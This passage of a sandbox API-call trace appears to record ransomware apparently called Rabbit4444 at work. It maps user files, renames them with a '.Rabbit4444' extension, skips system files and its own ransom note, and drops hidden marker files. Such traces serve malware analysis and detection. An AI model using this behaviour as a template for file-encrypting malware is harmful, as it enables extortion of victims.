| out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.263] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15857405393) returned 1 [0067.263] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0067.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.263] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x260 [0067.265] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.266] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15857720873) returned 1 [0067.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0067.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.267] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.267] CloseHandle (hObject=0x260) returned 1 [0067.267] CloseHandle (hObject=0x27c) returned 1 [0067.267] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt.Rabbit4444") returned 196 [0067.267] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\0.2.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.267] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799c29bd, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x799c29bd, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x799c29bd, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a35b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ft", cAlternateFileName="")) returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="Rabbit4444.exe") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2=".") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="..") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="windows") returned -1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="bootmgr") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="pagefile.sys") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="boot") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="ids.txt") returned 1 [0067.268] lstrcmpiW (lpString1="Settings.ft", lpString2="NTUSER.DAT") returned 1 [0067.268] lstrcpyW (in: lpString1=0x130ec6c, lpString2="Settings.ft" | out: lpString1="Settings.ft") returned="Settings.ft" [0067.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.ft", dwFileAttributes=0x0) returned 1 [0067.268] lstrlenW (lpString="Settings.ft") returned 11 [0067.268] lstrlenW (lpString="Rabbit4444") returned 10 [0067.268] lstrcmpiW (lpString1="ettings.ft", lpString2="Rabbit4444") returned -1 [0067.268] lstrlenW (lpString=".dll") returned 4 [0067.268] lstrcmpiW (lpString1="s.ft", lpString2=".dll") returned 1 [0067.268] lstrlenW (lpString=".lnk") returned 4 [0067.268] lstrcmpiW (lpString1="s.ft", lpString2=".lnk") returned 1 [0067.268] lstrlenW (lpString=".ini") returned 4 [0067.268] lstrcmpiW (lpString1="s.ft", lpString2=".ini") returned 1 [0067.268] lstrlenW (lpString=".sys") returned 4 [0067.268] lstrcmpiW (lpString1="s.ft", lpString2=".sys") returned 1 [0067.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.ft"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.269] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.269] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15857963362) returned 1 [0067.269] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=107355) returned 1 [0067.269] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0067.269] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0067.269] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a660, lpName=0x0) returned 0x260 [0067.270] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a660) returned 0x70000 [0067.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115390 [0067.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.277] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15858732976) returned 1 [0067.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0067.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0067.277] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.278] CloseHandle (hObject=0x260) returned 1 [0067.278] CloseHandle (hObject=0x27c) returned 1 [0067.278] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.ft.Rabbit4444") returned 176 [0067.278] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.ft"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.ft.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.ft.rabbit4444"), dwFlags=0x1) returned 1 [0067.279] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794a058d, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x794a058d, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x799c29bd, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x821fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.index", cAlternateFileName="SETTIN~1.IND")) returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="Rabbit4444.exe") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2=".") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="..") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="windows") returned -1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="bootmgr") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="pagefile.sys") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="boot") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="ids.txt") returned 1 [0067.279] lstrcmpiW (lpString1="Settings.index", lpString2="NTUSER.DAT") returned 1 [0067.279] lstrcpyW (in: lpString1=0x130ec6c, lpString2="Settings.index" | out: lpString1="Settings.index") returned="Settings.index" [0067.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.index", dwFileAttributes=0x0) returned 1 [0067.279] lstrlenW (lpString="Settings.index") returned 14 [0067.279] lstrlenW (lpString="Rabbit4444") returned 10 [0067.279] lstrcmpiW (lpString1="ings.index", lpString2="Rabbit4444") returned -1 [0067.279] lstrlenW (lpString=".dll") returned 4 [0067.279] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0067.279] lstrlenW (lpString=".lnk") returned 4 [0067.279] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0067.279] lstrlenW (lpString=".ini") returned 4 [0067.279] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0067.279] lstrlenW (lpString=".sys") returned 4 [0067.279] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0067.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.280] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.280] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15859065335) returned 1 [0067.280] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=532987) returned 1 [0067.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0067.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0067.280] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82500, lpName=0x0) returned 0x260 [0067.281] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x82500) returned 0x2b0000 [0067.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115390 [0067.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.297] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15860737848) returned 1 [0067.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0067.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0067.297] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0067.302] CloseHandle (hObject=0x260) returned 1 [0067.302] CloseHandle (hObject=0x27c) returned 1 [0067.302] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.index.Rabbit4444") returned 179 [0067.302] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\Settings.index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\settings.index.rabbit4444"), dwFlags=0x1) returned 1 [0067.303] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794a058d, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x794a058d, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x799c29bd, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x821fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.index", cAlternateFileName="SETTIN~1.IND")) returned 0 [0067.303] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0067.303] lstrcpyW (in: lpString1=0x130ec6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{549dafe6-de7c-4227-9b89-3b85713bbc8d}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.304] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.304] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.306] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.306] CloseHandle (hObject=0x27c) returned 1 [0067.306] CloseHandle (hObject=0x228) returned 1 [0067.306] GetCurrentThreadId () returned 0xd98 [0067.306] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0067.306] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}" [0067.306] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.306] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0067.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}" [0067.306] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\" [0067.306] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\.BFC0E91B00AE8A0620D3" [0067.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.309] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.312] FlushFileBuffers (hFile=0x228) returned 1 [0067.313] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.313] CloseHandle (hObject=0x228) returned 1 [0067.314] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}") returned 153 [0067.314] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x525872ee, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x53362df6, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf1721e94, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0067.314] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.314] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.314] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.314] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x525872ee, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x53362df6, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xf1721e94, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.314] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.314] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.314] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.314] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1721e94, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1721e94, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1721e94, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.314] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.314] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c8819a, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x52c8819a, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x52e5203f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x160bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.0.filtertrie.intermediate.txt", cAlternateFileName="00FILT~1.TXT")) returned 1 [0067.314] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="HOW TO 